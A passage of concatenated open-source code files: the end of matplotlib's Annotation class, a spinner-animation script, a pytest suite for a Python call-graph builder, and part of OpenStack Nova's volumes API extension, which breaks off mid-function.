'figure fraction' fraction of figure from lower left
'axes points' points from lower left corner of axes
'axes pixels' pixels from lower left corner of axes
'axes fraction' fraction of axes from lower left
'data' use the coordinate system of the object being
annotated (default)
'polar' *(theta,r)* if not native 'data' coordinates
================= ===============================================
If a `~matplotlib.artist.Artist` object is passed in the units are
fraction if it's bounding box.
If a `~matplotlib.transforms.Transform` object is passed
in use that to transform ``xy`` to screen coordinates
If a callable it must take a
`~matplotlib.backend_bases.RendererBase` object as input
and return a `~matplotlib.transforms.Transform` or
`~matplotlib.transforms.Bbox` object
If a `tuple` must be length 2 tuple of str, `Artist`,
`Transform` or callable objects. The first transform is
used for the *x* coordinate and the second for *y*.
See :ref:`plotting-guide-annotation` for more details.
Defaults to ``'data'``
textcoords : str, `Artist`, `Transform`, callable or tuple, optional
The coordinate system that ``xytext`` is given, which
may be different than the coordinate system used for
``xy``.
All ``xycoords`` values are valid as well as the following
strings:
================= =========================================
Property Description
================= =========================================
'offset points' offset (in points) from the *xy* value
'offset pixels' offset (in pixels) from the *xy* value
================= =========================================
defaults to the input of ``xycoords``
arrowprops : dict, optional
If not None, properties used to draw a
`~matplotlib.patches.FancyArrowPatch` arrow between ``xy`` and
``xytext``.
If `arrowprops` does not contain the key ``'arrowstyle'`` the
allowed keys are:
========== ======================================================
Key Description
========== ======================================================
width the width of the arrow in points
headwidth the width of the base of the arrow head in points
headlength the length of the arrow head in points
shrink fraction of total length to 'shrink' from both ends
? any key to :class:`matplotlib.patches.FancyArrowPatch`
========== ======================================================
If the `arrowprops` contains the key ``'arrowstyle'`` the
above keys are forbidden. The allowed values of
``'arrowstyle'`` are:
============ =============================================
Name Attrs
============ =============================================
``'-'`` None
``'->'`` head_length=0.4,head_width=0.2
``'-['`` widthB=1.0,lengthB=0.2,angleB=None
``'|-|'`` widthA=1.0,widthB=1.0
``'-|>'`` head_length=0.4,head_width=0.2
``'<-'`` head_length=0.4,head_width=0.2
``'<->'`` head_length=0.4,head_width=0.2
``'<|-'`` head_length=0.4,head_width=0.2
``'<|-|>'`` head_length=0.4,head_width=0.2
``'fancy'`` head_length=0.4,head_width=0.4,tail_width=0.4
``'simple'`` head_length=0.5,head_width=0.5,tail_width=0.2
``'wedge'`` tail_width=0.3,shrink_factor=0.5
============ =============================================
Valid keys for `~matplotlib.patches.FancyArrowPatch` are:
=============== ==================================================
Key Description
=============== ==================================================
arrowstyle the arrow style
connectionstyle the connection style
relpos default is (0.5, 0.5)
patchA default is bounding box of the text
patchB default is None
shrinkA default is 2 points
shrinkB default is 2 points
mutation_scale default is text size (in points)
mutation_aspect default is 1.
? any key for :class:`matplotlib.patches.PathPatch`
=============== ==================================================
Defaults to None
annotation_clip : bool, optional
Controls the visibility of the annotation when it goes
outside the axes area.
If `True`, the annotation will only be drawn when the
``xy`` is inside the axes. If `False`, the annotation will
always be drawn regardless of its position.
The default is `None`, which behave as `True` only if
*xycoords* is "data".
Returns
-------
Annotation
'''
_AnnotationBase.__init__(self,
xy,
xycoords=xycoords,
annotation_clip=annotation_clip)
# warn about wonky input data
if (xytext is None and
textcoords is not None and
textcoords != xycoords):
warnings.warn("You have used the `textcoords` kwarg, but not "
"the `xytext` kwarg. This can lead to surprising "
"results.")
# clean up textcoords and assign default
if textcoords is None:
textcoords = self.xycoords
self._textcoords = textcoords
# cleanup xytext defaults
if xytext is None:
xytext = self.xy
x, y = xytext
Text.__init__(self, x, y, s, **kwargs)
self.arrowprops = arrowprops
self.arrow = None
if arrowprops:
if "arrowstyle" in arrowprops:
arrowprops = self.arrowprops.copy()
self._arrow_relpos = arrowprops.pop("relpos", (0.5, 0.5))
else:
# modified YAArrow API to be used with FancyArrowPatch
shapekeys = ('width', 'headwidth', 'headlength',
'shrink', 'frac')
arrowprops = dict()
for key, val in self.arrowprops.items():
if key not in shapekeys:
arrowprops[key] = val # basic Patch properties
self.arrow_patch = FancyArrowPatch((0, 0), (1, 1),
**arrowprops)
else:
self.arrow_patch = None
def contains(self, event):
contains, tinfo = Text.contains(self, event)
if self.arrow is not None:
in_arrow, _ = self.arrow.contains(event)
contains = contains or in_arrow
if self.arrow_patch is not None:
in_patch, _ = self.arrow_patch.contains(event)
contains = contains or in_patch
return contains, tinfo
@property
def xyann(self):
return self.get_position()
@xyann.setter
def xyann(self, xytext):
self.set_position(xytext)
@property
def anncoords(self):
return self._textcoords
@anncoords.setter
def anncoords(self, coords):
self._textcoords = coords
def set_figure(self, fig):
if self.arrow is not None:
self.arrow.set_figure(fig)
if self.arrow_patch is not None:
self.arrow_patch.set_figure(fig)
Artist.set_figure(self, fig)
def update_positions(self, renderer):
""""Update the pixel positions of the annotated point and the
text.
"""
xy_pixel = self._get_position_xy(renderer)
self._update_position_xytext(renderer, xy_pixel)
def _update_position_xytext(self, renderer, xy_pixel):
"""Update the pixel positions of the annotation text and the arrow
patch.
"""
# generate transformation,
self.set_transform(self._get_xy_transform(renderer, self.anncoords))
ox0, oy0 = self._get_xy_display()
ox1, oy1 = xy_pixel
if self.arrowprops:
x0, y0 = xy_pixel
l, b, w, h = Text.get_window_extent(self, renderer).bounds
r = l + w
t = b + h
xc = 0.5 * (l + r)
yc = 0.5 * (b + t)
d = self.arrowprops.copy()
ms = d.pop("mutation_scale", self.get_size())
self.arrow_patch.set_mutation_scale(ms)
if "arrowstyle" not in d:
# Approximately simulate the YAArrow.
# Pop its kwargs:
shrink = d.pop('shrink', 0.0)
width = d.pop('width', 4)
headwidth = d.pop('headwidth', 12)
# Ignore frac--it is useless.
frac = d.pop('frac', None)
if frac is not None:
warnings.warn(
"'frac' option in 'arrowprops' is no longer supported;"
" use 'headlength' to set the head length in points.")
headlength = d.pop('headlength', 12)
# NB: ms is in pts
stylekw = dict(head_length=headlength / ms,
head_width=headwidth / ms,
tail_width=width / ms)
self.arrow_patch.set_arrowstyle('simple', **stylekw)
# using YAArrow style:
# pick the x,y corner of the text bbox closest to point
# annotated
xpos = ((l, 0), (xc, 0.5), (r, 1))
ypos = ((b, 0), (yc, 0.5), (t, 1))
dsu = [(abs(val[0] - x0), val) for val in xpos]
dsu.sort()
_, (x, relposx) = dsu[0]
dsu = [(abs(val[0] - y0), val) for val in ypos]
dsu.sort()
_, (y, relposy) = dsu[0]
self._arrow_relpos = (relposx, relposy)
r = np.hypot((y - y0), (x - x0))
shrink_pts = shrink * r / renderer.points_to_pixels(1)
self.arrow_patch.shrinkA = shrink_pts
self.arrow_patch.shrinkB = shrink_pts
# adjust the starting point of the arrow relative to
# the textbox.
# TODO : Rotation needs to be accounted.
relpos = self._arrow_relpos
bbox = Text.get_window_extent(self, renderer)
ox0 = bbox.x0 + bbox.width * relpos[0]
oy0 = bbox.y0 + bbox.height * relpos[1]
# The arrow will be drawn from (ox0, oy0) to (ox1,
# oy1). It will be first clipped by patchA and patchB.
# Then it will be shrunk by shirnkA and shrinkB
# (in points). If patch A is not set, self.bbox_patch
# is used.
self.arrow_patch.set_positions((ox0, oy0), (ox1, oy1))
if "patchA" in d:
self.arrow_patch.set_patchA(d.pop("patchA"))
else:
if self._bbox_patch:
self.arrow_patch.set_patchA(self._bbox_patch)
else:
pad = renderer.points_to_pixels(4)
if self.get_text().strip() == "":
self.arrow_patch.set_patchA(None)
return
bbox = Text.get_window_extent(self, renderer)
l, b, w, h = bbox.bounds
l -= pad / 2.
b -= pad / 2.
w += pad
h += pad
r = Rectangle(xy=(l, b),
width=w,
height=h,
)
r.set_transform(mtransforms.IdentityTransform())
r.set_clip_on(False)
self.arrow_patch.set_patchA(r)
@allow_rasterization
def draw(self, renderer):
"""
Draw the :class:`Annotation` object to the given *renderer*.
"""
if renderer is not None:
self._renderer = renderer
if not self.get_visible():
return
xy_pixel = self._get_position_xy(renderer)
if not self._check_xy(renderer, xy_pixel):
return
self._update_position_xytext(renderer, xy_pixel)
self.update_bbox_position_size(renderer)
if self.arrow_patch is not None: # FancyArrowPatch
if self.arrow_patch.figure is None and self.figure is not None:
self.arrow_patch.figure = self.figure
self.arrow_patch.draw(renderer)
# Draw text, including FancyBboxPatch, after FancyArrowPatch.
# Otherwise, a wedge arrowstyle can land partly on top of the Bbox.
Text.draw(self, renderer)
def get_window_extent(self, renderer=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text and arrow annotation, in display units.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure. The
*dpi* used defaults to self.figure.dpi; the renderer dpi is
irrelevant.
'''
if not self.get_visible():
return Bbox.unit()
arrow = self.arrow
arrow_patch = self.arrow_patch
text_bbox = Text.get_window_extent(self, renderer=renderer)
bboxes = [text_bbox]
if self.arrow is not None:
bboxes.append(arrow.get_window_extent(renderer=renderer))
elif self.arrow_patch is not None:
bboxes.append(arrow_patch.get_window_extent(renderer=renderer))
return Bbox.union(bboxes)
docstring.interpd.update(Annotation=Annotation.__init__.__doc__)
| apache-2.0 |
CCPorg/PAS-PastaCoin-Ver-631-Original | share/qt/make_spinner.py | 4415 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
SRC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(SRC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit |
burlog/py-static-callgraph | tests/args.py | 2 | 7835 | # -*- coding: utf-8 -*-
#
# LICENCE MIT
#
# DESCRIPTION Test suite for variable assigns.
#
# AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz>
#
import pytest, re
from functools import wraps
from callgraph.builder import CallGraphBuilder
from tests.helpers import dfs_node_names
def test_args_simple():
def fun1(a):
a.strip()
def fun():
a = ""
fun1(a)
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_kwarg():
def fun1(a):
a.strip()
def fun():
a = ""
fun1(a=a)
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_from_return():
def fun1(a):
a.strip()
def fun2():
return ""
def fun():
fun1(fun2())
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_stararg_simple():
def fun1(a):
a.strip()
def fun():
a = [""]
fun1(*a)
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_stararg_from_call():
def fun2():
return [""]
def fun1(a):
a.strip()
def fun():
fun1(*fun2())
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="static list/tuple implementation")
def test_args_stararg_opaque():
def fun1(a):
a.strip()
def fun():
b = list("")
for a in []:
b.append(a)
fun1(*b)
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.list", "fun.append", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_starkwarg_simple():
def fun1(a):
a.strip()
def fun():
a = {"a": ""}
fun1(**a)
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_starkwarg_from_call():
def fun2():
return {"a": "1"}
return {"b": "2"}
return {"c": "3"}
return {"a": 4}
def fun1(a):
a.strip()
return a
def fun():
fun1(**fun2()).to_bytes(1, "big")
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip", "fun.to_bytes"]
assert list(dfs_node_names(root)) == path
def test_args_fun_starargs_simple():
def fun1(*args):
for a in args:
a.strip()
def fun():
fun1("")
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_fun_starargs_empty():
def fun1(*args):
"".strip()
def fun():
fun1()
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_fun_starargs_from_fun():
def fun2():
return ""
return 3
def fun1(*args):
for a in args:
a.strip()
def fun():
fun1(fun2())
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun2", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="list/tuple subscription")
def test_args_fun_starargs_subscription():
def fun1(*args):
args[0].strip()
def fun():
fun1("")
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_fun_starkwargs_simple():
def fun1(**kwargs):
for a in kwargs:
a.strip()
def fun():
fun1(a="")
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_fun_starkwargs_empty():
def fun1(**kwargs):
"".strip()
def fun():
fun1()
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="dict subscription")
def test_args_fun_starkwargs_subscription():
def fun1(**kwargs):
kwargs["a"].strip()
def fun():
fun1(a="")
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
def test_args_fun_default_simple():
def fun1(a=""):
a.strip()
def fun():
fun1()
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.fun1", "fun.fun1.strip"]
assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="list/tuple subscription")
def test_args_fun_starargs_self():
class A:
def __init__(*args):
self = args[0]
self.a = ""
def fun():
a = A()
a.a.strip()
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.A", "fun.strip"]
assert list(dfs_node_names(root)) == path
@pytest.mark.skipif(True, reason="dict subscription")
def test_args_fun_starkwargs_self():
class A:
def __init__(**kwargs):
self = kwargs["self"]
self.a = ""
def fun():
a = A()
a.a.strip()
builder = CallGraphBuilder()
root = builder.build(fun)
from callgraph.indent_printer import dump_tree
dump_tree(root, lambda x: x.children)
path = ["fun", "fun.A", "fun.strip"]
assert list(dfs_node_names(root)) == path
| mit |
luzheqi1987/nova-annotation | nova/api/openstack/compute/contrib/volumes.py | 1 | 25929 | # Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes extension."""
from oslo.utils import strutils
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
from nova.i18n import _
from nova import objects
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova import volume
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'volumes')
authorize_attach = extensions.extension_authorizer('compute',
'volume_attachments')
def _translate_volume_detail_view(context, vol):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availabilityZone'] = vol['availability_zone']
d['createdAt'] = vol['created_at']
if vol['attach_status'] == 'attached':
d['attachments'] = [_translate_attachment_detail_view(vol['id'],
vol['instance_uuid'],
vol['mountpoint'])]
else:
d['attachments'] = [{}]
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volumeType'] = vol['volume_type']['name']
else:
d['volumeType'] = vol['volume_type_id']
d['snapshotId'] = vol['snapshot_id']
LOG.audit(_("vol=%s"), vol, context=context)
if vol.get('volume_metadata'):
d['metadata'] = vol.get('volume_metadata')
else:
d['metadata'] = {}
return d
def make_volume(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('availabilityZone')
elem.set('createdAt')
elem.set('displayName')
elem.set('displayDescription')
elem.set('volumeType')
elem.set('snapshotId')
attachments = xmlutil.SubTemplateElement(elem, 'attachments')
attachment = xmlutil.SubTemplateElement(attachments, 'attachment',
selector='attachments')
make_attachment(attachment)
# Attach metadata node
elem.append(common.MetadataTemplate())
class VolumeTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volume', selector='volume')
make_volume(root)
return xmlutil.MasterTemplate(root, 1)
class VolumesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumes')
elem = xmlutil.SubTemplateElement(root, 'volume', selector='volumes')
make_volume(elem)
return xmlutil.MasterTemplate(root, 1)
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_volume(self, node):
"""Marshal the volume attribute of a parsed request."""
vol = {}
volume_node = self.find_first_child_named(node, 'volume')
attributes = ['display_name', 'display_description', 'size',
'volume_type', 'availability_zone']
for attr in attributes:
if volume_node.getAttribute(attr):
vol[attr] = volume_node.getAttribute(attr)
metadata_node = self.find_first_child_named(volume_node, 'metadata')
if metadata_node is not None:
vol['metadata'] = self.extract_metadata(metadata_node)
return vol
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted create volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
def default(self, string):
"""Deserialize an xml-formatted volume create request."""
dom = xmlutil.safe_minidom_parse_string(string)
vol = self._extract_volume(dom)
return {'body': {'volume': vol}}
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(VolumeController, self).__init__()
@wsgi.serializers(xml=VolumeTemplate)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get(context, id)
except exception.NotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return {'volume': _translate_volume_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
authorize(context)
LOG.audit(_("Delete volume with id: %s"), id, context=context)
try:
self.volume_api.delete(context, id)
except exception.NotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return webob.Response(status_int=202)
@wsgi.serializers(xml=VolumesTemplate)
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@wsgi.serializers(xml=VolumesTemplate)
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
volumes = self.volume_api.get_all(context)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
@wsgi.serializers(xml=VolumeTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new volume."""
context = req.environ['nova.context']
authorize(context)
if not self.is_valid_body(body, 'volume'):
msg = _("volume not specified")
raise exc.HTTPBadRequest(explanation=msg)
vol = body['volume']
vol_type = vol.get('volume_type', None)
metadata = vol.get('metadata', None)
snapshot_id = vol.get('snapshot_id')
if snapshot_id is not None:
snapshot = self.volume_api.get_snapshot(context, snapshot_id)
else:
snapshot = None
size = vol.get('size', None)
if size is None and snapshot is not None:
size = snapshot['volume_size']
LOG.audit(_("Create volume of %s GB"), size, context=context)
availability_zone = vol.get('availability_zone', None)
try:
new_volume = self.volume_api.create(
context,
size,
vol.get('display_name'),
vol.get('display_description'),
snapshot=snapshot,
volume_type=vol_type,
metadata=metadata,
availability_zone=availability_zone
)
except exception.InvalidInput as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume))
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _translate_attachment_detail_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(volume_id,
instance_uuid,
mountpoint)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment summary view."""
d = {}
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volumeId'] = volume_id
d['serverId'] = instance_uuid
if mountpoint:
d['device'] = mountpoint
return d
def make_attachment(elem):
elem.set('id')
elem.set('serverId')
elem.set('volumeId')
elem.set('device')
class VolumeAttachmentTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumeAttachment',
selector='volumeAttachment')
make_attachment(root)
return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumeAttachments')
elem = xmlutil.SubTemplateElement(root, 'volumeAttachment',
selector='volumeAttachments')
make_attachment(elem)
return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentController(wsgi.Controller):
"""The volume attachment API controller for the OpenStack API.
A child resource of the server. Note that we use the volume id
as the ID of the attachment (though this is not guaranteed externally)
"""
def __init__(self, ext_mgr=None):
self.compute_api = compute.API()
self.volume_api = volume.API()
self.ext_mgr = ext_mgr
super(VolumeAttachmentController, self).__init__()
@wsgi.serializers(xml=VolumeAttachmentsTemplate)
def index(self, req, server_id):
"""Returns the list of volume attachments for a given instance."""
context = req.environ['nova.context']
authorize_attach(context, action='index')
return self._items(req, server_id,
entity_maker=_translate_attachment_summary_view)
@wsgi.serializers(xml=VolumeAttachmentTemplate)
def show(self, req, server_id, id):
"""Return data about the given volume attachment."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='show')
volume_id = id
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
if not bdms:
msg = _("Instance %s is not attached.") % server_id
raise exc.HTTPNotFound(explanation=msg)
assigned_mountpoint = None
for bdm in bdms:
if bdm.volume_id == volume_id:
assigned_mountpoint = bdm.device_name
break
if assigned_mountpoint is None:
msg = _("volume_id not found: %s") % volume_id
raise exc.HTTPNotFound(explanation=msg)
return {'volumeAttachment': _translate_attachment_detail_view(
volume_id,
instance['uuid'],
assigned_mountpoint)}
def _validate_volume_id(self, volume_id):
if not uuidutils.is_uuid_like(volume_id):
msg = _("Bad volumeId format: volumeId is "
"not in proper format (%s)") % volume_id
raise exc.HTTPBadRequest(explanation=msg)
@wsgi.serializers(xml=VolumeAttachmentTemplate)
def create(self, req, server_id, body):
"""Attach a volume to an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='create')
if not self.is_valid_body(body, 'volumeAttachment'):
msg = _("volumeAttachment not specified")
raise exc.HTTPBadRequest(explanation=msg)
try:
volume_id = body['volumeAttachment']['volumeId']
except KeyError:
msg = _("volumeId must be specified.")
raise exc.HTTPBadRequest(explanation=msg)
device = body['volumeAttachment'].get('device')
self._validate_volume_id(volume_id)
LOG.audit(_("Attach volume %(volume_id)s to instance %(server_id)s "
"at %(device)s"),
{'volume_id': volume_id,
'device': device,
'server_id': server_id},
context=context)
instance = common.get_instance(self.compute_api, context, server_id,
want_objects=True)
try:
device = self.compute_api.attach_volume(context, instance,
volume_id, device)
except exception.NotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'attach_volume', server_id)
# The attach is async
attachment = {}
attachment['id'] = volume_id
attachment['serverId'] = server_id
attachment['volumeId'] = volume_id
attachment['device'] = device
# NOTE(justinsb): And now, we have a problem...
# The attach is async, so there's a window in which we don't see
# the attachment (until the attachment completes). We could also
# get problems with concurrent requests. I think we need an
# attachment state, and to write to the DB here, but that's a bigger
# change.
# For now, we'll probably have to rely on libraries being smart
# TODO(justinsb): How do I return "accepted" here?
return {'volumeAttachment': attachment}
def update(self, req, server_id, id, body):
if (not self.ext_mgr or
not self.ext_mgr.is_loaded('os-volume-attachment-update')):
raise exc.HTTPBadRequest()
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='update')
if not self.is_valid_body(body, 'volumeAttachment'):
msg = _("volumeAttachment not specified")
raise exc.HTTPBadRequest(explanation=msg)
old_volume_id = id
old_volume = self.volume_api.get(context, old_volume_id)
try:
new_volume_id = body['volumeAttachment']['volumeId']
except KeyError:
msg = _("volumeId must be specified.")
raise exc.HTTPBadRequest(explanation=msg)
self._validate_volume_id(new_volume_id)
new_volume = self.volume_api.get(context, new_volume_id)
instance = common.get_instance(self.compute_api, context, server_id,
want_objects=True)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
found = False
try:
for bdm in bdms:
if bdm.volume_id != old_volume_id:
continue
try:
self.compute_api.swap_volume(context, instance, old_volume,
new_volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'swap_volume', server_id)
if not found:
msg = _("volume_id not found: %s") % old_volume_id
raise exc.HTTPNotFound(explanation=msg)
else:
return webob.Response(status_int=202)
def delete(self, req, server_id, id):
"""Detach a volume from an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='delete')
volume_id = id
LOG.audit(_("Detach volume %s"), volume_id, context=context)
instance = common.get_instance(self.compute_api, context, server_id,
want_objects=True)
volume = self.volume_api.get(context, volume_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
if not bdms:
msg = _("Instance %s is not attached.") % server_id
raise exc.HTTPNotFound(explanation=msg)
found = False
try:
for bdm in bdms:
if bdm.volume_id != volume_id:
continue
if bdm.is_root:
msg = _("Can't detach root device volume")
raise exc.HTTPForbidden(explanation=msg)
try:
self.compute_api.detach_volume(context, instance, volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'detach_volume', server_id)
if not found:
msg = _("volume_id not found: %s") % volume_id
raise exc.HTTPNotFound(explanation=msg)
else:
return webob.Response(status_int=202)
def _items(self, req, server_id, entity_maker):
"""Returns a list of attachments, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
limited_list = common.limited(bdms, req)
results = []
for bdm in limited_list:
